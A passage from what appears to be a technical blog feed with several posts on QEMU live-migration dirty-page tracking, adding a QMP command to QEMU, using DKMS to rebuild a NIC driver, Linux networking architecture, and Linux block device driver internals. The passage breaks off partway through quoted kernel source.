<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>while (s->state == MIGRATION_STATUS_ACTIVE ||
s->state == MIGRATION_STATUS_POSTCOPY_ACTIVE) {
...
if (!qemu_file_rate_limit(s->to_dst_file)) {
uint64_t pend_post, pend_nonpost;
qemu_savevm_state_pending(s->to_dst_file, max_size, &pend_nonpost,
&pend_post);
...
if (pending_size && pending_size >= max_size) {
/* Still a significant amount to transfer */
if (migrate_postcopy_ram() &&
s->state != MIGRATION_STATUS_POSTCOPY_ACTIVE &&
pend_nonpost <= max_size &&
atomic_read(&s->start_postcopy)) {
if (!postcopy_start(s, &old_vm_running)) {
current_active_state = MIGRATION_STATUS_POSTCOPY_ACTIVE;
entered_postcopy = true;
}
continue;
}
/* Just another iteration step */
qemu_savevm_state_iterate(s->to_dst_file, entered_postcopy);
} else {
trace_migration_thread_low_pending(pending_size);
migration_completion(s, current_active_state,
&old_vm_running, &start_time);
break;
}
}
}
</code></pre></div></div>
<p>Here show the three most important function. ‘qemu_savevm_state_pending’, ‘qemu_savevm_state_iterate’ and
‘migration_completion’. For ram, the save pending function is ‘ram_save_pending’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void ram_save_pending(QEMUFile *f, void *opaque, uint64_t max_size,
uint64_t *non_postcopiable_pending,
uint64_t *postcopiable_pending)
{
uint64_t remaining_size;
remaining_size = ram_save_remaining() * TARGET_PAGE_SIZE;
if (!migration_in_postcopy(migrate_get_current()) &&
remaining_size < max_size) {
qemu_mutex_lock_iothread();
rcu_read_lock();
migration_bitmap_sync();
rcu_read_unlock();
qemu_mutex_unlock_iothread();
remaining_size = ram_save_remaining() * TARGET_PAGE_SIZE;
}
/* We can do postcopy, and all the data is postcopiable */
*postcopiable_pending += remaining_size;
}
</code></pre></div></div>
<p>This function calls ‘migration_bitmap_sync’ to get the dirty page bitmap in ‘migration_bitmap_rcu->bmap’.
In the iterate function ‘ram_save_iterate’ it calls ‘ram_find_and_save_block’ to find the dirty page and
then send out to the dest host.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int ram_save_iterate(QEMUFile *f, void *opaque)
{
int ret;
int i;
int64_t t0;
int done = 0;
rcu_read_lock();
if (ram_list.version != last_version) {
reset_ram_globals();
}
/* Read version before ram_list.blocks */
smp_rmb();
ram_control_before_iterate(f, RAM_CONTROL_ROUND);
t0 = qemu_clock_get_ns(QEMU_CLOCK_REALTIME);
i = 0;
while ((ret = qemu_file_rate_limit(f)) == 0) {
int pages;
pages = ram_find_and_save_block(f, false, &bytes_transferred);
/* no more pages to sent */
if (pages == 0) {
done = 1;
break;
}
acct_info.iterations++;
/* we want to check in the 1st loop, just in case it was the 1st time
and we had to sync the dirty bitmap.
qemu_get_clock_ns() is a bit expensive, so we only check each some
iterations
*/
if ((i & 63) == 0) {
uint64_t t1 = (qemu_clock_get_ns(QEMU_CLOCK_REALTIME) - t0) / 1000000;
if (t1 > MAX_WAIT) {
DPRINTF("big wait: %" PRIu64 " milliseconds, %d iterations\n",
t1, i);
break;
}
}
i++;
}
...
return done;
}
</code></pre></div></div>
<p>‘ram_find_and_save_block–>get_queued_page’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static bool get_queued_page(MigrationState *ms, PageSearchStatus *pss,
ram_addr_t *ram_addr_abs)
{
RAMBlock *block;
ram_addr_t offset;
bool dirty;
do {
block = unqueue_page(ms, &offset, ram_addr_abs);
/*
* We're sending this page, and since it's postcopy nothing else
* will dirty it, and we must make sure it doesn't get sent again
* even if this queue request was received after the background
* search already sent it.
*/
if (block) {
unsigned long *bitmap;
bitmap = atomic_rcu_read(&migration_bitmap_rcu)->bmap;
dirty = test_bit(*ram_addr_abs >> TARGET_PAGE_BITS, bitmap);
if (!dirty) {
trace_get_queued_page_not_dirty(
block->idstr, (uint64_t)offset,
(uint64_t)*ram_addr_abs,
test_bit(*ram_addr_abs >> TARGET_PAGE_BITS,
atomic_rcu_read(&migration_bitmap_rcu)->unsentmap));
} else {
trace_get_queued_page(block->idstr,
(uint64_t)offset,
(uint64_t)*ram_addr_abs);
}
}
} while (block && !dirty);
if (block) {
/*
* As soon as we start servicing pages out of order, then we have
* to kill the bulk stage, since the bulk stage assumes
* in (migration_bitmap_find_and_reset_dirty) that every page is
* dirty, that's no longer true.
*/
ram_bulk_stage = false;
/*
* We want the background search to continue from the queued page
* since the guest is likely to want other pages near to the page
* it just requested.
*/
pss->block = block;
pss->offset = offset;
}
return !!block;
}
</code></pre></div></div>
<p>In this function we find the dirty page in bitmap.</p>
<p>The following shows the process of dirty bitmap tracking.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>+-------------+ +----------+ +--------------+ +---------------------+
| | | ram_list +-----> | dirty_memory +--------> | migration_bitmap_rcu|
| | +----------+ +------+-------+ +---------------------+
| Guest | ^
| | |
| | |
| | |
| +--------------------------------+ |
| | | |
| | | |
| | | |
| | v |
| | |
| | +---------+ +-------+--------+
| | | memslot +-----> | dirty_bitmap |
+-------------+ +---------+ +----------------+
</code></pre></div></div>
Add a new qmp command for qemu 2018-07-25T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/07/25/add-new-qmp
<p>There is a detail <a href="https://github.com/qemu/qemu/blob/master/docs/devel/writing-qmp-commands.txt">documentation</a> for writing a new qmp command for qemu, I just make a note for this. As the documnetation said, to create a new qmp command needs the following four steps:</p>
<ol>
<li>
<p>Define the command and any types it needs in the appropriate QAPI
schema module.</p>
</li>
<li>
<p>Write the QMP command itself, which is a regular C function. Preferably,
the command should be exported by some QEMU subsystem. But it can also be
added to the qmp.c file</p>
</li>
<li>
<p>At this point the command can be tested under the QMP protocol</p>
</li>
<li>
<p>Write the HMP command equivalent. This is not required and should only be
done if it does make sense to have the functionality in HMP. The HMP command
is implemented in terms of the QMP command</p>
</li>
</ol>
<p>The first step is to add the command in qapi-schema.json file. Add following command to the last of the file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{ 'command': 'qmp-test', 'data': {'value': 'int'} }
</code></pre></div></div>
<p>Second, add the QMP processing function, add following function to qmp.c file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>unsigned int test_a = 0;
void qmp_qmp_test(int64_t value, Error **errp)
{
if (value > 100 || value < 0)
{
error_setg(errp, QERR_INVALID_PARAMETER_VALUE, "value a", "not valid");
return;
}
test_a = value;
}
</code></pre></div></div>
<p>At this time, we can send qmp command to qemu.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{"execute":"qmp-test","arguments":{"value":80}}
</code></pre></div></div>
<p>Also we often want to send more human readable command, so we can add hmp command.</p>
<p>Add following to hmp-commands.hx in the middle of it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
.name = "qmp-test",
.args_type = "value:i",
.params = "value",
.help = "set test a.",
.cmd = hmp_qmp_test,
},
STEXI
@item qmp-test @var{value}
Set test a to @var{value}.
ETEXI
</code></pre></div></div>
<p>Add following to last of hmp.c file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void hmp_qmp_test(Monitor *mon, const QDict *qdict)
{
int64_t value = qdict_get_int(qdict, "value");
qmp_qmp_test(value, NULL);
}
</code></pre></div></div>
<p>Add following to last of hmp.h file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void hmp_qmp_test(Monitor *mon, const QDict *qdict);
</code></pre></div></div>
<p>After compile the qemu, we can use ‘qmp-test 80’ command in the monitor.</p>
dkms 1012018-07-14T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/07/14/dkms-101
<p>Loadable kernel module is very useful for dynamically adding functionality to the running kernel.
As the free of Linux, we can often update/install new kernel easily. For some distributions, every time we install a new kernel, we need to compile the loadable module at the same time. This is very boring and in sometimes it can do some harmness. This is the Dynamic Kernel Module Support (DKMS) can play a role. DKMS is a program/framework that enables generating Linux kernel modules whose sources generally reside outside the kernel source tree. And the DKMS modules will be automatically rebuilt when a new kernel is installed.</p>
<p>This article will just focus how to use the dkms but not include the internals of it.</p>
<p>Let’s use the x710 network card VF driver as an example.</p>
<h3> No DKMS </h3>
<p>Firstly, Let’s see the system self-contained i40evf driver.</p>
<p><img src="/assets/img/dkms/1.png" alt="" /></p>
<p>Here it has a low version of driver. We mannually override it with a more newer version.</p>
<p><img src="/assets/img/dkms/2.png" alt="" /></p>
<p>It works, now let’s update the dist, this also updates the kernel.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> apt-get dist-upgrade
</code></pre></div></div>
<p>Look at the i40evf again, it rolls back to the lower version again. If we want to use the high version i40evf, we need to compile it again.</p>
<p><img src="/assets/img/dkms/3.png" alt="" /></p>
<h3> With DKMS </h3>
<p>Firstly, we need move the source file into the /usr/src directory. For example</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/src/i40evf-3.4.2
</code></pre></div></div>
<p>Notice here i40evf-3.4.2 directory is the src directory in i40evf-3.4.2.tar.gz.</p>
<p>In this directory we need create a file named dkms.conf. Following is the file content.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@debian91:/usr/src/i40evf-3.4.2# cat dkms.conf
PACKAGE_NAME="i40evf"
PACKAGE_VERSION="3.4.2"
CLEAN="make clean"
BUILT_MODULE_NAME[0]="i40evf"
DEST_MODULE_LOCATION[0]="/updates"
AUTOINSTALL="yes"
</code></pre></div></div>
<p>Then install the dkms package.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> apt-get install dkms
</code></pre></div></div>
<p><img src="/assets/img/dkms/4.png" alt="" /></p>
<p>Don’t forget install the linux headers package to build the module.</p>
<p>Now the i40evf has been updated to 3.4.2.</p>
<p><img src="/assets/img/dkms/5.png" alt="" /></p>
<p>Updates the dist and reboot.</p>
<p><img src="/assets/img/dkms/6.png" alt="" /></p>
<p>Notice the md5 checksum, we can make sure the i40evf module has been automatically rebuilt.</p>
<p>Also we ‘dkms status’ can show the dkms module installed.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@debian91:~# dkms status
i40evf, 3.4.2, 4.9.0-3-amd64, x86_64: installed
i40evf, 3.4.2, 4.9.0-6-amd64, x86_64: installed
</code></pre></div></div>
Linux kernel networking: a general introduction2018-06-17T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/06/17/linux-net-general-intro
<p>Linux’s networking is originated from the BSD’s socket just like most of the Unix-like operating system, this is called TCP/IP protocol. The TCP/IP protocol stack contains four layer in concept. The top-most is application layer , then trasport layer , next IP layer and finally the data link layer. Linux networking protocol stack is very complicated, this article will just talk about the general architecture. The following articles will contain more details though I don’t how much there will be.</p>
<p>As we know, there are lots of protocols in the kernel and also there are lots of physical network card in the world. The linux need to abstract the common code and also the special code for every protocol and device. So the function pointer is in everywhere of network subsystem, and actually in everywhere of Linux kernel.
Follwing pic shows the Linux core network architecture.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +--------------------------+
| system call interface |
+--------------------------+
+------------------------------+
| protocol agnostic interface |
+------------------------------+
+------------------------------+
| network protocols |
+------+------+-------+--------+
| | | | |
| inet | dccp | sctp | packet |
| | | | |
+------+------+-------+--------+
+------------------------------+
| device agnostic interface |
+------------------------------+
+------------------------------+
| device drivers |
+------+------+-------+--------+
| | | | |
|e1000 | virtio vmxnet| ... |
| | | | |
+------+------+-------+--------+
</code></pre></div></div>
<h3 id="system-call-inteface">System call inteface</h3>
<p>Easy to understand, all the Unix-like operating system have the same system call interface. The socket, bind, listen, accept, connect and some other system call are all available in all operating system. Also the socket is abstracted as a file descriptor and the usespace interact with the kernel with this fd. The</p>
<h3 id="protocol-agnostic-interface">protocol agnostic interface</h3>
<p>This is the struct ‘sock’, as the struct ‘socket’ connect with the VFS(fd) for the userspace, the ‘sock’ connects with the following protocols.</p>
<h3 id="network-protocols">network protocols</h3>
<p>Here defines a lot of network protocols, for example the IPV4 protocol stacks, the ipx, irda and the other directory in linux/net directory. And for every network protocol stack, there are a ‘family’ for example the ipv4 is ‘inet_family_ops’. In the initialization, the kernel will add some protocols in the family, for example TCP/UDP.</p>
<h3 id="device-agnostic-interface">device agnostic interface</h3>
<p>This layer connects the protocols to the various network devices. This contains the common interface for example the device driver can register the network card device using ‘register_netdevice’, also it can send packet using ‘dev_queue_xmit’. They are all not related with a specific protocol and specific network device.</p>
<h3 id="device-driver">device driver</h3>
<p>This layer is the physical networkcard device that does the finally send/receiver packet work. There are lots of network device driver in linux/drivers/net directory.</p>
<p>The next articles will discuss this general picture in more details. Stay hungry, stay foolish.</p>
<h3 id="reference">reference</h3>
<p>Anatomy of the Linux networking stack</p>
Anatomy of the Linux block device driver2018-06-14T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/06/14/linux-block-device-driver
<p>In linux device driver, the block device is different from the char device which one we have discussed before. In this article we will discuss the block device driver.</p>
<h3 id="block-subsystem-initialization">block subsystem initialization</h3>
<p>Block subsystem is initialized in ‘genhd_device_init’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int __init genhd_device_init(void)
{
int error;
block_class.dev_kobj = sysfs_dev_block_kobj;
error = class_register(&block_class);
if (unlikely(error))
return error;
bdev_map = kobj_map_init(base_probe, &block_class_lock);
blk_dev_init();
register_blkdev(BLOCK_EXT_MAJOR, "blkext");
/* create top-level block dir */
if (!sysfs_deprecated)
block_depr = kobject_create_and_add("block", NULL);
return 0;
}
</code></pre></div></div>
<p>‘block_class’ will indicate the ‘/dev/block’ directory.
‘bdev_map’ is a ‘struct kobj_map’ which we has discussed in the char device driver.
Initialization work seems quite simple.</p>
<h3 id="register-block-devices-number">register block device’s number</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int register_blkdev(unsigned int major, const char *name)
{
struct blk_major_name **n, *p;
int index, ret = 0;
mutex_lock(&block_class_lock);
/* temporary */
if (major == 0) {
for (index = ARRAY_SIZE(major_names)-1; index > 0; index--) {
if (major_names[index] == NULL)
break;
}
if (index == 0) {
printk("register_blkdev: failed to get major for %s\n",
name);
ret = -EBUSY;
goto out;
}
major = index;
ret = major;
}
p = kmalloc(sizeof(struct blk_major_name), GFP_KERNEL);
if (p == NULL) {
ret = -ENOMEM;
goto out;
}
p->major = major;
strlcpy(p->name, name, sizeof(p->name));
p->next = NULL;
index = major_to_index(major);
for (n = &major_names[index]; *n; n = &(*n)->next) {
if ((*n)->major == major)
break;
}
if (!*n)
*n = p;
else
ret = -EBUSY;
if (ret < 0) {
printk("register_blkdev: cannot get major %d for %s\n",
major, name);
kfree(p);
}
out:
mutex_unlock(&block_class_lock);
return ret;
}
static struct blk_major_name {
struct blk_major_name *next;
int major;
char name[16];
} *major_names[BLKDEV_MAJOR_HASH_SIZE];
</code></pre></div></div>
<p>‘register_blkdev’ is very like ‘register_chrdev_region’ just except the former uses ‘major_names’. ‘register_blkdev’ is used to manage the block device major number.</p>
<h3 id="block_device">block_device</h3>
<p>‘block_device ‘ represent a logic block device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct block_device {
dev_t bd_dev; /* not a kdev_t - it's a search key */
int bd_openers;
struct inode * bd_inode; /* will die */
struct super_block * bd_super;
struct mutex bd_mutex; /* open/close mutex */
struct list_head bd_inodes;
void * bd_claiming;
void * bd_holder;
int bd_holders;
bool bd_write_holder;
#ifdef CONFIG_SYSFS
struct list_head bd_holder_disks;
#endif
struct block_device * bd_contains;
unsigned bd_block_size;
struct hd_struct * bd_part;
/* number of times partitions within this device have been opened. */
unsigned bd_part_count;
int bd_invalidated;
struct gendisk * bd_disk;
struct request_queue * bd_queue;
struct list_head bd_list;
/*
* Private data. You must have bd_claim'ed the block_device
* to use this. NOTE: bd_claim allows an owner to claim
* the same device multiple times, the owner must take special
* care to not mess up bd_private for that case.
*/
unsigned long bd_private;
/* The counter of freeze processes */
int bd_fsfreeze_count;
/* Mutex for freeze */
struct mutex bd_fsfreeze_mutex;
};
</code></pre></div></div>
<p>This struct not only can represent a complete logical device, and also can represent a partition in a logical block device.If it is for a complete block device, the ‘bd_part’ represents this device’s partition info. if it is for a partition, the ‘bd_contains’ indicates the block device which belongs to. When a block device or its partition has been open, the kernel will create a ‘block_device’, we will discuss later. ‘block_device’ is used for connecting the virtual file system and block device driver, so the block device driver has little chance to control it. ‘block_device’ is often used with the ‘bdev’ file system.</p>
<h3 id="struct-gendisk">struct gendisk</h3>
<p>struct gendisk represents a real disk. It is allocated and controled by the block device driver.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct gendisk {
/* major, first_minor and minors are input parameters only,
* don't use directly. Use disk_devt() and disk_max_parts().
*/
int major; /* major number of driver */
int first_minor;
int minors; /* maximum number of minors, =1 for
* disks that can't be partitioned. */
char disk_name[DISK_NAME_LEN]; /* name of major driver */
char *(*devnode)(struct gendisk *gd, umode_t *mode);
unsigned int events; /* supported events */
unsigned int async_events; /* async events, subset of all */
/* Array of pointers to partitions indexed by partno.
* Protected with matching bdev lock but stat and other
* non-critical accesses use RCU. Always access through
* helpers.
*/
struct disk_part_tbl __rcu *part_tbl;
struct hd_struct part0;
const struct block_device_operations *fops;
struct request_queue *queue;
void *private_data;
int flags;
struct device *driverfs_dev; // FIXME: remove
struct kobject *slave_dir;
struct timer_rand_state *random;
atomic_t sync_io; /* RAID */
struct disk_events *ev;
#ifdef CONFIG_BLK_DEV_INTEGRITY
struct blk_integrity *integrity;
#endif
int node_id;
};
</code></pre></div></div>
<p>‘minors’ indicates the max minor device, if it is one, we can’t make partition for this block device.</p>
<p>‘disk_part_tbl’ represents the disk’s partition table info, in his field, the ‘part’ represents the partitions.</p>
<p>‘queue’ represents the I/O request in this block device.</p>
<p>‘part0’ indicates the first partition, if no partition it represent the whole device.</p>
<p>The block device driver has to allocate gendisk and initialize the field in it. gendisk can represent a partitioned disk or no partition disk, when the driver calls’ ‘add_disk’ to add it to system, the kernel will decide whether scan this partition info.</p>
<h3 id="struct-hd_struct">struct hd_struct</h3>
<p>‘hd_struct’ represents a partition info in a block device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct hd_struct {
sector_t start_sect;
/*
* nr_sects is protected by sequence counter. One might extend a
* partition while IO is happening to it and update of nr_sects
* can be non-atomic on 32bit machines with 64bit sector_t.
*/
sector_t nr_sects;
seqcount_t nr_sects_seq;
sector_t alignment_offset;
unsigned int discard_alignment;
struct device __dev;
struct kobject *holder_dir;
int policy, partno;
struct partition_meta_info *info;
#ifdef CONFIG_FAIL_MAKE_REQUEST
int make_it_fail;
#endif
unsigned long stamp;
atomic_t in_flight[2];
#ifdef CONFIG_SMP
struct disk_stats __percpu *dkstats;
#else
struct disk_stats dkstats;
#endif
atomic_t ref;
struct rcu_head rcu_head;
};
</code></pre></div></div>
<p>‘start_sect’, ‘nr_sects’ and ‘parto’ represen this partition’s start sector, number of sectors and partition number. The ‘__dev’ means a partition will be considered as a device.</p>
<h3 id="alloc_disk">alloc_disk</h3>
<p>‘alloc_disk’ can be used to allocate a gendisk struct and also do some initialization.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct gendisk *alloc_disk(int minors)
{
return alloc_disk_node(minors, NUMA_NO_NODE);
}
struct gendisk *alloc_disk_node(int minors, int node_id)
{
struct gendisk *disk;
disk = kzalloc_node(sizeof(struct gendisk), GFP_KERNEL, node_id);
if (disk) {
if (!init_part_stats(&disk->part0)) {
kfree(disk);
return NULL;
}
disk->node_id = node_id;
if (disk_expand_part_tbl(disk, 0)) {
free_part_stats(&disk->part0);
kfree(disk);
return NULL;
}
disk->part_tbl->part[0] = &disk->part0;
/*
* set_capacity() and get_capacity() currently don't use
* seqcounter to read/update the part0->nr_sects. Still init
* the counter as we can read the sectors in IO submission
* patch using seqence counters.
*
* TODO: Ideally set_capacity() and get_capacity() should be
* converted to make use of bd_mutex and sequence counters.
*/
seqcount_init(&disk->part0.nr_sects_seq);
hd_ref_init(&disk->part0);
disk->minors = minors;
rand_initialize_disk(disk);
disk_to_dev(disk)->class = &block_class;
disk_to_dev(disk)->type = &disk_type;
device_initialize(disk_to_dev(disk));
}
return disk;
}
int disk_expand_part_tbl(struct gendisk *disk, int partno)
{
struct disk_part_tbl *old_ptbl = disk->part_tbl;
struct disk_part_tbl *new_ptbl;
int len = old_ptbl ? old_ptbl->len : 0;
int target = partno + 1;
size_t size;
int i;
/* disk_max_parts() is zero during initialization, ignore if so */
if (disk_max_parts(disk) && target > disk_max_parts(disk))
return -EINVAL;
if (target <= len)
return 0;
size = sizeof(*new_ptbl) + target * sizeof(new_ptbl->part[0]);
new_ptbl = kzalloc_node(size, GFP_KERNEL, disk->node_id);
if (!new_ptbl)
return -ENOMEM;
new_ptbl->len = target;
for (i = 0; i < len; i++)
rcu_assign_pointer(new_ptbl->part[i], old_ptbl->part[i]);
disk_replace_part_tbl(disk, new_ptbl);
return 0;
}
</code></pre></div></div>
<p>The argument of ‘alloc_disk’ minors indicates the max partition of this disk can have.
Tough work is done in ‘alloc_disk_node’. ‘disk_expand_part_tbl’ is to allocate the gendisk’s part_tbl field and then assigned the gendisk’s part0 to disk->part_tbl->part[0]. part0 is a hd_struct and also can represent a whole disk device. Finally ‘alloc_disk’ will do the trivial work that the device driver model requires.</p>
<h3 id="add_disk">add_disk</h3>
<p>After allocating the gendisk and do some initialization, we need add the gendisk to system. This is done by ‘add_disk’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void add_disk(struct gendisk *disk)
{
struct backing_dev_info *bdi;
dev_t devt;
int retval;
/* minors == 0 indicates to use ext devt from part0 and should
* be accompanied with EXT_DEVT flag. Make sure all
* parameters make sense.
*/
WARN_ON(disk->minors && !(disk->major || disk->first_minor));
WARN_ON(!disk->minors && !(disk->flags & GENHD_FL_EXT_DEVT));
disk->flags |= GENHD_FL_UP;
retval = blk_alloc_devt(&disk->part0, &devt);
if (retval) {
WARN_ON(1);
return;
}
disk_to_dev(disk)->devt = devt;
/* ->major and ->first_minor aren't supposed to be
* dereferenced from here on, but set them just in case.
*/
disk->major = MAJOR(devt);
disk->first_minor = MINOR(devt);
disk_alloc_events(disk);
/* Register BDI before referencing it from bdev */
bdi = &disk->queue->backing_dev_info;
bdi_register_dev(bdi, disk_devt(disk));
blk_register_region(disk_devt(disk), disk->minors, NULL,
exact_match, exact_lock, disk);
register_disk(disk);
blk_register_queue(disk);
/*
* Take an extra ref on queue which will be put on disk_release()
* so that it sticks around as long as @disk is there.
*/
WARN_ON_ONCE(!blk_get_queue(disk->queue));
retval = sysfs_create_link(&disk_to_dev(disk)->kobj, &bdi->dev->kobj,
"bdi");
WARN_ON(retval);
disk_add_events(disk);
}
</code></pre></div></div>
<p>In block device, the major number represent the device driver and the minor number represent a partition of the device driver manages. ‘blk_alloc_devt’ generates the block device device number.
‘blk_register_region’ is a very important function as it adds the block device to the system just like the char does. Insert the devt to global variable ‘bdev_map’.
Next is ‘register_disk’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void register_disk(struct gendisk *disk)
{
struct device *ddev = disk_to_dev(disk);
struct block_device *bdev;
struct disk_part_iter piter;
struct hd_struct *part;
int err;
ddev->parent = disk->driverfs_dev;
dev_set_name(ddev, "%s", disk->disk_name);
/* delay uevents, until we scanned partition table */
dev_set_uevent_suppress(ddev, 1);
if (device_add(ddev))
return;
if (!sysfs_deprecated) {
err = sysfs_create_link(block_depr, &ddev->kobj,
kobject_name(&ddev->kobj));
if (err) {
device_del(ddev);
return;
}
}
/*
* avoid probable deadlock caused by allocating memory with
* GFP_KERNEL in runtime_resume callback of its all ancestor
* devices
*/
pm_runtime_set_memalloc_noio(ddev, true);
disk->part0.holder_dir = kobject_create_and_add("holders", &ddev->kobj);
disk->slave_dir = kobject_create_and_add("slaves", &ddev->kobj);
/* No minors to use for partitions */
if (!disk_part_scan_enabled(disk))
goto exit;
/* No such device (e.g., media were just removed) */
if (!get_capacity(disk))
goto exit;
bdev = bdget_disk(disk, 0);
if (!bdev)
goto exit;
bdev->bd_invalidated = 1;
err = blkdev_get(bdev, FMODE_READ, NULL);
if (err < 0)
goto exit;
blkdev_put(bdev, FMODE_READ);
exit:
/* announce disk after possible partitions are created */
dev_set_uevent_suppress(ddev, 0);
kobject_uevent(&ddev->kobj, KOBJ_ADD);
/* announce possible partitions */
disk_part_iter_init(&piter, disk, 0);
while ((part = disk_part_iter_next(&piter)))
kobject_uevent(&part_to_dev(part)->kobj, KOBJ_ADD);
disk_part_iter_exit(&piter);
}
</code></pre></div></div>
<p>The first part is to do the device model operation. Most important is ‘device_add’, after this function, there will be a /dev/xx, /dev/ramhda for example.
‘disk_part_scan_enabled’ will return false if this disk can’t be partitioned and ‘register_disk’ wil exit. If it can, go ahead.
‘bdget_disk’ will get a ‘block_device’ this is a very important struct</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct block_device *bdget_disk(struct gendisk *disk, int partno)
{
struct hd_struct *part;
struct block_device *bdev = NULL;
part = disk_get_part(disk, partno);
if (part)
bdev = bdget(part_devt(part));
disk_put_part(part);
return bdev;
}
EXPORT_SYMBOL(bdget_disk);
struct block_device *bdget(dev_t dev)
{
struct block_device *bdev;
struct inode *inode;
inode = iget5_locked(blockdev_superblock, hash(dev),
bdev_test, bdev_set, &dev);
if (!inode)
return NULL;
bdev = &BDEV_I(inode)->bdev;
if (inode->i_state & I_NEW) {
bdev->bd_contains = NULL;
bdev->bd_super = NULL;
bdev->bd_inode = inode;
bdev->bd_block_size = (1 << inode->i_blkbits);
bdev->bd_part_count = 0;
bdev->bd_invalidated = 0;
inode->i_mode = S_IFBLK;
inode->i_rdev = dev;
inode->i_bdev = bdev;
inode->i_data.a_ops = &def_blk_aops;
mapping_set_gfp_mask(&inode->i_data, GFP_USER);
inode->i_data.backing_dev_info = &default_backing_dev_info;
spin_lock(&bdev_lock);
list_add(&bdev->bd_list, &all_bdevs);
spin_unlock(&bdev_lock);
unlock_new_inode(inode);
}
return bdev;
}
struct inode *iget5_locked(struct super_block *sb, unsigned long hashval,
int (*test)(struct inode *, void *),
int (*set)(struct inode *, void *), void *data)
{
struct hlist_head *head = inode_hashtable + hash(sb, hashval);
struct inode *inode;
spin_lock(&inode_hash_lock);
inode = find_inode(sb, head, test, data);
spin_unlock(&inode_hash_lock);
if (inode) {
wait_on_inode(inode);
return inode;
}
inode = alloc_inode(sb);
if (inode) {
struct inode *old;
spin_lock(&inode_hash_lock);
/* We released the lock, so.. */
old = find_inode(sb, head, test, data);
if (!old) {
if (set(inode, data))
goto set_failed;
spin_lock(&inode->i_lock);
inode->i_state = I_NEW;
hlist_add_head(&inode->i_hash, head);
spin_unlock(&inode->i_lock);
inode_sb_list_add(inode);
spin_unlock(&inode_hash_lock);
/* Return the locked inode with I_NEW set, the
* caller is responsible for filling in the contents
*/
return inode;
}
/*
* Uhhuh, somebody else created the same inode under
* us. Use the old inode instead of the one we just
* allocated.
*/
spin_unlock(&inode_hash_lock);
destroy_inode(inode);
inode = old;
wait_on_inode(inode);
}
return inode;
set_failed:
spin_unlock(&inode_hash_lock);
destroy_inode(inode);
return NULL;
}
</code></pre></div></div>
<p>Here ‘iget5_locked’ uses the global variable ‘blockdev_superblock’ as the superblock and will finally call blockdev_superblock->s_op->alloc_inode, this actually is ‘bdev_alloc_inode’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static struct inode *bdev_alloc_inode(struct super_block *sb)
{
struct bdev_inode *ei = kmem_cache_alloc(bdev_cachep, GFP_KERNEL);
if (!ei)
return NULL;
return &ei->vfs_inode;
}
struct bdev_inode {
struct block_device bdev;
struct inode vfs_inode;
};
</code></pre></div></div>
<p>From this we know, ‘iget5_locked’ return a inode in a ‘bdev_inode’ struct and from this inode, we can actually get the ‘block_device’ field ‘bdev’.
In ‘iget5_locked’, it calls ‘bdev_set’, this set the ‘bdev.bd_dev’ to the disk’s device number.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int bdev_set(struct inode *inode, void *data)
{
BDEV_I(inode)->bdev.bd_dev = *(dev_t *)data;
return 0;
}
</code></pre></div></div>
<p>After get the ‘block_device’, ‘register_disk’ set ‘bdev->bd_invalidated’ to 1, this give the kernel chance to scan this disk again.
Next is to call ‘blkdev_get’, it actually calls ‘__blkdev_get’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int blkdev_get(struct block_device *bdev, fmode_t mode, void *holder)
{
struct block_device *whole = NULL;
int res;
WARN_ON_ONCE((mode & FMODE_EXCL) && !holder);
if ((mode & FMODE_EXCL) && holder) {
whole = bd_start_claiming(bdev, holder);
if (IS_ERR(whole)) {
bdput(bdev);
return PTR_ERR(whole);
}
}
res = __blkdev_get(bdev, mode, 0);
if (whole) {
struct gendisk *disk = whole->bd_disk;
/* finish claiming */
mutex_lock(&bdev->bd_mutex);
spin_lock(&bdev_lock);
if (!res) {
BUG_ON(!bd_may_claim(bdev, whole, holder));
/*
* Note that for a whole device bd_holders
* will be incremented twice, and bd_holder
* will be set to bd_may_claim before being
* set to holder
*/
whole->bd_holders++;
whole->bd_holder = bd_may_claim;
